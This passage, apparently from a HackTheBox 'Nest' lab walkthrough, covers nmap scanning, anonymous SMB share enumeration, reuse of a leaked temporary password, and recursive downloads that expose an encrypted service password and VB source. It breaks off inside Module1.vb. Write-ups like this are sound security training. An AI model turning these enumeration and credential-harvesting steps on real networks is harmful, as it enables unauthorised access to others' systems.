HackTheBox - Nest πŸ•ŠοΈπŸ£

HackTheBox β€Ί PenTesting
, , , , , , ,

HackTheBox-Nest

Quick Summary

β†’ This machine is really awesome because it has a lot of enumeration especially on SMBClient side. you need a strong knowledge of active directory. Rated as easy machine but other says it is medium box because there is a debugging mode that beginner players have some trouble with it. But unlike other machine’ this one I don’t have a proper shell.

Penetration Testing Methodologies

  1. Network Scanning

    β†’ Nmap scan

    β†’ discover open ports and what services are running

  2. Enumeration

    β†’ Service enumeration

    β†’ Enumeration smb shares

    β†’ In this phase there was a lot of SMB Enumeration’ different files has discovered inside

    β†’ Analyzing the retrived content, some interesting at file RU_Config.xml and config.xml

  3. Post - Exploitation

    β†’ Analyze how the decrypting of password works `

    β†’ Decrypting the password with `dotnetfiddle

    β†’ running the script will give the password for user

  4. Exploitation

    β†’ Enumeration C.Smith user

    β†’ Login as C.Smith with SMB

    β†’ finally got the user.txt

  5. Privilege Escalation

    β†’ I initially came across the Debug Mode Password.txt

    β†’ HQK Reporting Service v1.2 service running on port 4386

    β†’ Enumerate HQK Reporting Service v1.2 with telnet and this will give a lot of informatio

    β†’ get and execute the .exe file – HqkLdap.exe will give the Administrator password

    β†’ Finally get the root.txt flag but with SMB Client

Network Scanning

Walkthrough

β†’ I always begin at NMAP to look on the services what is running. I always use

  • -sV β‡’ Probe open ports to determine service/version info
  • -sC β‡’ equivalent to β€”script=default
  • -A- β‡’ Agressive scan
  • -oN β‡’ to save our scan results to a text file
# bash

nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest

# bash

root in ~/htb/Nest 
❯ nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 08:26 PST
Nmap scan report for 10.10.10.178
Host is up (0.21s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista:icrosoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 Rndows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 o1%), Microsoft Windows Embedded Standard 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
4386/tcp open  unknown
[snip]
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
[snip]
Host script results:
|_clock-skew: 2m26s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-22T00:29:42
|_  start_date: 2020-03-21T23:00:50

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   223.12 ms 10.10.14.1
2   223.23 ms 10.10.10.178

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.08 seconds

root in ~/htb/Nest took 1m52s 
❯

Nmap results

So there’s only 2 port open.

  • 445 β‡’ which is SMB Client
  • 4386 β‡’ this port is unknow. but in nmap results it has a service of HQK Service

Enumeration

Since TCP/445 is open, we can take a look to see what shares are available:

# bash

root in htb/boxes/Nest
❯ smbclient -L \\\\10.10.10.178
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

root in htb/boxes/Nest
❯

The Data share seems to be accessible anonymously. We can recursively list the contents of the share with smbclient so :

# bash

root in htb/boxes/Nest 
❯ smbclient  \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 06:53:46 2019
  ..                                  D        0  Thu Aug  8 06:53:46 2019
  IT                                  D        0  Thu Aug  8 06:58:07 2019
  Production                          D        0  Tue Aug  6 05:53:38 2019
  Reports                             D        0  Tue Aug  6 05:53:44 2019
  Shared                              D        0  Thu Aug  8 03:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .                                   D        0  Thu Aug  8 03:07:51 2019
  ..                                  D        0  Thu Aug  8 03:07:51 2019
  Maintenance                         D        0  Thu Aug  8 03:07:32 2019
  Templates                           D        0  Thu Aug  8 03:08:07 2019

\Shared\Maintenance
  .                                   D        0  Thu Aug  8 03:07:32 2019
  ..                                  D        0  Thu Aug  8 03:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 07:01:44 2019

\Shared\Templates
  .                                   D        0  Thu Aug  8 03:08:07 2019
  ..                                  D        0  Thu Aug  8 03:08:07 2019
  HR                                  D        0  Thu Aug  8 03:08:01 2019
  Marketing                           D        0  Thu Aug  8 03:08:06 2019

\Shared\Templates\HR
  .                                   D        0  Thu Aug  8 03:08:01 2019
  ..                                  D        0  Thu Aug  8 03:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 06:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Thu Aug  8 03:08:06 2019
  ..                                  D        0  Thu Aug  8 03:08:06 2019
smb: \> 




smb: \> cd \Shared\Templates\HR
smb: \Shared\Templates\HR\> ls                                                                                                                                                                                                            
  .                                   D        0  Thu Aug  8 03:08:01 2019                                                                                                                                                                
  ..                                  D        0  Thu Aug  8 03:08:01 2019                                                                                                                                                                
  Welcome Email.txt                   A      425  Thu Aug  8 06:55:36 2019

                10485247 blocks of size 4096. 6543883 blocks available

smb: \Shared\Templates\HR\>

To easily listed all the directory i use the command recurse on, and as you can see’ there was a potential files which is the Maintenance Alerts.txt and Welcome Email.txt. I download it with smbclient :

# bash

smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \Shared\Templates\HR\>

Then let’s read the what’s the content of .txt file :

# bash

root in htb/boxes/Nest 
❯ cat 'Welcome Email.txt' 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
root in htb/boxes/Nest 
❯

Next is the Maintenance Alerts.txt

# bash

Current directory is \Shared\Templates\HR\
smb: \Shared\Templates\HR\> cd /
smb: \> cd \Shared\Maintenance
smb: \Shared\Maintenance\> ls
  .                                   D        0  Thu Aug  8 03:07:32 2019
  ..                                  D        0  Thu Aug  8 03:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 07:01:44 2019

                10485247 blocks of size 4096. 6543883 blocks available
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Shared\Maintenance\>

Then read the content :

# bash

root in htb/boxes/Nest 
❯ cat 'Maintenance Alerts.txt' 
There is currently no scheduled maintenance work
root in htb/boxes/Nest 
❯

Not much interesting so let’s move another phase.

Enumerating SMB Shares

The Welcome Email.txt give us credentials of TempUser. so I’ll try it to smbclient then let’s see if gives us any further access to the Data share so :

# bash

root in htb/boxes/Nest 
❯ smbclient  \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 06:53:46 2019
  ..                                  D        0  Thu Aug  8 06:53:46 2019
  IT                                  D        0  Thu Aug  8 06:58:07 2019
  Production                          D        0  Tue Aug  6 05:53:38 2019
  Reports                             D        0  Tue Aug  6 05:53:44 2019
  Shared                              D        0  Thu Aug  8 03:07:51 2019

\IT
  .                                   D        0  Thu Aug  8 06:58:07 2019
  ..                                  D        0  Thu Aug  8 06:58:07 2019
  Archive                             D        0  Tue Aug  6 06:33:58 2019
  Configs                             D        0  Thu Aug  8 06:59:34 2019
  Installs                            D        0  Thu Aug  8 06:08:30 2019
  Reports                             D        0  Sun Jan 26 08:09:13 2020
  Tools                               D        0  Tue Aug  6 06:33:43 2019

\Production
  .                                   D        0  Tue Aug  6 05:53:38 2019
  ..                                  D        0  Tue Aug  6 05:53:38 2019

\Reports
  .                                   D        0  Tue Aug  6 05:53:44 2019
  ..                                  D        0  Tue Aug  6 05:53:44 2019

\Shared
  .                                   D        0  Thu Aug  8 03:07:51 2019
  ..                                  D        0  Thu Aug  8 03:07:51 2019
  Maintenance                         D        0  Thu Aug  8 03:07:32 2019
  Templates                           D        0  Thu Aug  8 03:08:07 2019

\IT\Archive
  .                                   D        0  Tue Aug  6 06:33:58 2019
  ..                                  D        0  Tue Aug  6 06:33:58 2019

\IT\Configs
  .                                   D        0  Thu Aug  8 06:59:34 2019
  ..                                  D        0  Thu Aug  8 06:59:34 2019
  Adobe                               D        0  Thu Aug  8 03:20:09 2019
  Atlas                               D        0  Tue Aug  6 19:16:18 2019
  DLink                               D        0  Tue Aug  6 21:25:27 2019
  Microsoft                           D        0  Thu Aug  8 03:23:26 2019
  NotepadPlusPlus                     D        0  Thu Aug  8 03:31:37 2019
  RU Scanner                          D        0  Thu Aug  8 04:01:13 2019
  Server Manager                      D        0  Tue Aug  6 21:25:19 2019

\IT\Installs
  .                                   D        0  Thu Aug  8 06:08:30 2019
  ..                                  D        0  Thu Aug  8 06:08:30 2019

\IT\Reports
  .                                   D        0  Sun Jan 26 08:09:13 2020
  ..                                  D        0  Sun Jan 26 08:09:13 2020

\IT\Tools
  .                                   D        0  Tue Aug  6 06:33:43 2019
  ..                                  D        0  Tue Aug  6 06:33:43 2019

\Shared\Maintenance
  .                                   D        0  Thu Aug  8 03:07:32 2019
  ..                                  D        0  Thu Aug  8 03:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 07:01:44 2019

\Shared\Templates
  .                                   D        0  Thu Aug  8 03:08:07 2019
  ..                                  D        0  Thu Aug  8 03:08:07 2019
  HR                                  D        0  Thu Aug  8 03:08:01 2019
  Marketing                           D        0  Thu Aug  8 03:08:06 2019

\IT\Configs\Adobe
  .                                   D        0  Thu Aug  8 03:20:09 2019
  ..                                  D        0  Thu Aug  8 03:20:09 2019
  editing.xml                        AH      246  Sat Aug  3 20:58:42 2019
  Options.txt                         A        0  Tue Oct 11 05:11:14 2011
  projects.xml                        A      258  Wed Jan  9 00:30:52 2013
  settings.xml                        A     1274  Thu Aug  8 03:19:12 2019

\IT\Configs\Atlas
  .                                   D        0  Tue Aug  6 19:16:18 2019
  ..                                  D        0  Tue Aug  6 19:16:18 2019
  Temp.XML                            A     1369  Wed Jun 11 15:38:22 2003

\IT\Configs\DLink
  .                                   D        0  Tue Aug  6 21:25:27 2019
  ..                                  D        0  Tue Aug  6 21:25:27 2019

\IT\Configs\Microsoft
  .                                   D        0  Thu Aug  8 03:23:26 2019
  ..                                  D        0  Thu Aug  8 03:23:26 2019
  Options.xml                         A     4598  Sun Mar  4 03:24:24 2012

\IT\Configs\NotepadPlusPlus
  .                                   D        0  Thu Aug  8 03:31:37 2019
  ..                                  D        0  Thu Aug  8 03:31:37 2019
  config.xml                          A     6451  Thu Aug  8 07:01:25 2019
  shortcuts.xml                       A     2108  Thu Aug  8 03:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Thu Aug  8 04:01:13 2019
  ..                                  D        0  Thu Aug  8 04:01:13 2019
  RU_config.xml                       A      270  Fri Aug  9 03:49:37 2019

\IT\Configs\Server Manager
  .                                   D        0  Tue Aug  6 21:25:19 2019
  ..                                  D        0  Tue Aug  6 21:25:19 2019

\Shared\Templates\HR
  .                                   D        0  Thu Aug  8 03:08:01 2019
  ..                                  D        0  Thu Aug  8 03:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 06:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Thu Aug  8 03:08:06 2019
  ..                                  D        0  Thu Aug  8 03:08:06 2019

                10485247 blocks of size 4096. 6543883 blocks available
smb: \>


Looks like we have access to a some files in the IT directory now. I just recursively pull down all the files in the share so :

# bash

root in htb/boxes/Nest 
❯ smbget -R  smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml                                                                                                                                                                                     
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt                                                                                                                                                                                     
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml                                                                                                                                                                                    
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml                                                                                                                                                                                    
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML                                                                                                                                                                                        
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml                                                                                                                                                                                 
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml                                                                                                                                                                            
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml                                                                                                                                                                         
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml                                                                                                                                                                              
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt                                                                                                                                                                        
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt                                                                                                                                                                            
Downloaded 16.65kB in 95 seconds

root in htb/boxes/Nest took 1m34s 
❯ ls
 IT  'Maintenance Alerts.txt'   nmap-Nest   Production   Reports   Shared  'Welcome Email.txt'

root in htb/boxes/Nest 
❯

When I enumerate all the files 1 by 1 on my operating system i found interesting stuff – RU_Config.xml and config.xml inside this directory /IT/Configs/RU Scanner/RU_Config.xml

# bash

root in htb/boxes/Nest 
❯ cd IT/Configs/

root in Nest/IT/Configs 
❯ ls
 Adobe   Atlas   DLink   Microsoft   NotepadPlusPlus  'RU Scanner'  'Server Manager'

root in Nest/IT/Configs 
❯ cd 'RU Scanner'/

root in IT/Configs/RU Scanner 
❯ ls
RU_config.xml

root in IT/Configs/RU Scanner 
❯

and this the content of xml file I got :

# bash

root in IT/Configs/RU Scanner 
❯ cat RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
root in IT/Configs/RU Scanner 
❯

I thought I would use it to try authenticating to the SMB shares but its Authenticaition failed, So i think the password is encrypted’ leading me to suspect that the password needs to be decrypted.

Next the config.xml

# bash

root in IT/Configs/NotepadPlusPlus 
❯ cat config.xml 
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
    <GUIConfigs>
        <!-- 3 status : "large", "small" or "hide"-->
        <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
        <!-- 2 status : "show" or "hide"-->
        <GUIConfig name="StatusBar">show</GUIConfig>
        <!-- For all attributs, 2 status : "yes" or "no"-->
        <GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" />
        <!-- 2 positions : "horizontal" or "vertical"-->
        <GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig>
        <!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" -->
        <GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
        <GUIConfig name="TabSetting" size="4" replaceBySpace="no" />
        <!--App position-->
        <GUIConfig name="AppPosition" x="662" y="95" width="955" height="659" isMaximized="yes" />
        <!-- For the primary scintilla view,
             2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
             4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box"  -->
        <GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="yes" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" lineWrapMethod="aligned" zoom2="0" />
        <!-- For the secodary scintilla view,
             2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
             4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
        <GUIConfig name="Auto-detection">yes</GUIConfig>
        <GUIConfig name="CheckHistoryFiles">no</GUIConfig>
        <GUIConfig name="TrayIcon">no</GUIConfig>
        <GUIConfig name="RememberLastSession">yes</GUIConfig>
        <!--
                        New Document default settings :
                                format = 0/1/2 -> win/unix/mac
                                encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM
                                defaultLang = 0/1/2/..

                        Note 1 : UTF8-BOM -> UTF8 without BOM
                        Note 2 : for defaultLang :
                                        0 -> L_TXT
                                        1 -> L_PHP
                                        ... (see source file)
                -->
        <GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" codepage="-1" openAnsiAsUTF8="no" />
        <GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes" />
        <!--
                printOption is print colour setting, the following values are possible :
                        0 : WYSIWYG
                        1 : Invert colour
                        2 : B & W
                        3 : WYSIWYG but without background colour
                -->
        <GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" />
        <!--
                            Backup Setting :
                                0 : non backup
                                1 : simple backup
                                2 : verbose backup
                      -->
        <GUIConfig name="Backup" action="0" useCustumDir="no" dir="" />
        <GUIConfig name="TaskList">yes</GUIConfig>
        <GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig>
        <GUIConfig name="noUpdate" intervalDays="15" nextUpdateDate="20080426">no</GUIConfig>
        <GUIConfig name="MaitainIndent">yes</GUIConfig>
        <GUIConfig name="MRU">yes</GUIConfig>
        <GUIConfig name="URL">0</GUIConfig>
        <GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" />
        <GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" funcParams="no" />
        <GUIConfig name="sessionExt"></GUIConfig>
        <GUIConfig name="SmartHighLight">yes</GUIConfig>
        <GUIConfig name="TagsMatchHighLight" TagAttrHighLight="yes" HighLightNonHtmlZone="no">yes</GUIConfig>
        <GUIConfig name="MenuBar">show</GUIConfig>
        <GUIConfig name="Caret" width="1" blinkRate="250" />
        <GUIConfig name="ScintillaGlobalSettings" enableMultiSelection="no" />
        <GUIConfig name="openSaveDir" value="0" defaultDirPath="" />
        <GUIConfig name="titleBar" short="no" />
        <GUIConfig name="DockingManager" leftWidth="200" rightWidth="200" topHeight="200" bottomHeight="266">
            <FloatingWindow cont="4" x="39" y="109" width="531" height="364" />
            <PluginDlg pluginName="dummy" id="0" curr="3" prev="-1" isVisible="yes" />
            <PluginDlg pluginName="NppConverter.dll" id="3" curr="4" prev="0" isVisible="no" />
            <ActiveTabs cont="0" activeTab="-1" />
            <ActiveTabs cont="1" activeTab="-1" />
            <ActiveTabs cont="2" activeTab="-1" />
            <ActiveTabs cont="3" activeTab="-1" />
        </GUIConfig>
    </GUIConfigs>
    <!-- The History of opened files list -->
    <FindHistory nbMaxFindHistoryPath="10" nbMaxFindHistoryFilter="10" nbMaxFindHistoryFind="10" nbMaxFindHistoryReplace="10" matchWord="no" matchCase="no" wrap="yes" directionDown="yes" fifRecuisive="yes" fifInHiddenFolder="no" dlgAlwaysVisible="no" fifFilterFollowsDoc="no" fifFolderFollowsDoc="no" searchMode="0" transparencyMode="0" transparency="150">
        <Find name="text" />
        <Find name="txt" />
        <Find name="itx" />
        <Find name="iTe" />
        <Find name="IEND" />
        <Find name="redeem" />
        <Find name="activa" />
        <Find name="activate" />
        <Find name="redeem on" />
        <Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

root in IT/Configs/NotepadPlusPlus 
❯

Looking at the very bottom of config.xml I see another interesting stuff. Someone was accessing files on the Secure$ share as well as files on the C.Smith user’s desktop.

# bash

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
    <File filename="C:\windows\System32\drivers\etc\hosts" />
    <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
    <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>

Post Exploitation

Enumerate TempUser

so let’s see if we can access anything in this share as TempUser :

# bash

❯ smbclient  \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> recurse on
smb: \> ls
  .                                   D        0  Wed Aug  7 19:08:12 2019
  ..                                  D        0  Wed Aug  7 19:08:12 2019
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

smb: \>

Interesting; it seems that the TempUser doesn’t have any access to listing the 3 directories. but ultimately I found that the IT\Carl\ folder was indeed listable:

# bash

root in htb/boxes/Nest 
❯ smbclient  \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse on
smb: \IT\Carl\> ls
  .                                   D        0  Thu Aug  8 03:42:14 2019
  ..                                  D        0  Thu Aug  8 03:42:14 2019
  Docs                                D        0  Thu Aug  8 03:44:00 2019
  Reports                             D        0  Tue Aug  6 21:45:40 2019
  VB Projects                         D        0  Tue Aug  6 22:41:55 2019

\IT\Carl\Docs
  .                                   D        0  Thu Aug  8 03:44:00 2019
  ..                                  D        0  Thu Aug  8 03:44:00 2019
  ip.txt                              A       56  Thu Aug  8 03:44:16 2019
  mmc.txt                             A       73  Thu Aug  8 03:43:42 2019

\IT\Carl\Reports
  .                                   D        0  Tue Aug  6 21:45:40 2019
  ..                                  D        0  Tue Aug  6 21:45:40 2019

\IT\Carl\VB Projects
  .                                   D        0  Tue Aug  6 22:41:55 2019
  ..                                  D        0  Tue Aug  6 22:41:55 2019
  Production                          D        0  Tue Aug  6 22:07:13 2019
  WIP                                 D        0  Tue Aug  6 22:47:41 2019

\IT\Carl\VB Projects\Production
  .                                   D        0  Tue Aug  6 22:07:13 2019
  ..                                  D        0  Tue Aug  6 22:07:13 2019

\IT\Carl\VB Projects\WIP
  .                                   D        0  Tue Aug  6 22:47:41 2019
  ..                                  D        0  Tue Aug  6 22:47:41 2019
  RU                                  D        0  Fri Aug  9 23:36:45 2019

\IT\Carl\VB Projects\WIP\RU
  .                                   D        0  Fri Aug  9 23:36:45 2019
  ..                                  D        0  Fri Aug  9 23:36:45 2019
  RUScanner                           D        0  Thu Aug  8 06:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 22:45:36 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner
  .                                   D        0  Thu Aug  8 06:05:54 2019
  ..                                  D        0  Thu Aug  8 06:05:54 2019
  bin                                 D        0  Thu Aug  8 04:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 06:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 06:05:44 2019
  My Project                          D        0  Thu Aug  8 04:00:11 2019
  obj                                 D        0  Thu Aug  8 04:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 23:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 20:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 06:05:58 2019
  Utils.vb                            A     4888  Thu Aug  8 03:49:35 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
  .                                   D        0  Thu Aug  8 04:00:11 2019
  ..                                  D        0  Thu Aug  8 04:00:11 2019
  Debug                               D        0  Thu Aug  8 03:59:13 2019
  Release                             D        0  Tue Aug  6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
  .                                   D        0  Thu Aug  8 04:00:11 2019
  ..                                  D        0  Thu Aug  8 04:00:11 2019
  Application.Designer.vb             A      441  Tue Aug  6 20:55:13 2019
  Application.myapp                   A      481  Tue Aug  6 20:55:13 2019
  AssemblyInfo.vb                     A     1163  Tue Aug  6 20:55:13 2019
  Resources.Designer.vb               A     2776  Tue Aug  6 20:55:13 2019
  Resources.resx                      A     5612  Tue Aug  6 20:55:13 2019
  Settings.Designer.vb                A     2989  Tue Aug  6 20:55:13 2019
  Settings.settings                   A      279  Tue Aug  6 20:55:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
  .                                   D        0  Thu Aug  8 04:00:11 2019
  ..                                  D        0  Thu Aug  8 04:00:11 2019
  x86                                 D        0  Thu Aug  8 03:59:18 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
  .                                   D        0  Thu Aug  8 03:59:13 2019
  ..                                  D        0  Thu Aug  8 03:59:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
  .                                   D        0  Tue Aug  6 20:55:26 2019
  ..                                  D        0  Tue Aug  6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
  .                                   D        0  Thu Aug  8 03:59:18 2019
  ..                                  D        0  Thu Aug  8 03:59:18 2019

                10485247 blocks of size 4096. 6544137 blocks available
smb: \IT\Carl\>


Looks like there is some source code written in Visual Basic. SO I use smbget to recursively download the Secure$\IT\Carl directory for further analysis so :

# bash

root in htb/boxes/Nest 
❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 0b in 12 seconds

root in htb/boxes/Nest 12s
❯

So this is the whole directory I get :

# bash

root in WIP/RU/RUScanner 
❯ ls
 bin   ConfigFile.vb   Module1.vb  'My Project'   obj  'RU Scanner.vbproj'  'RU Scanner.vbproj.user'   SsoIntegration.vb   Utils.vb

root in WIP/RU/RUScanner 
❯

Looking at the .vb file the Module1.vb was responsible for retrieving the password from RU_config.xml :

# bash

root in WIP/RU/RUScanner 
❯ cat Module1.vb 
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
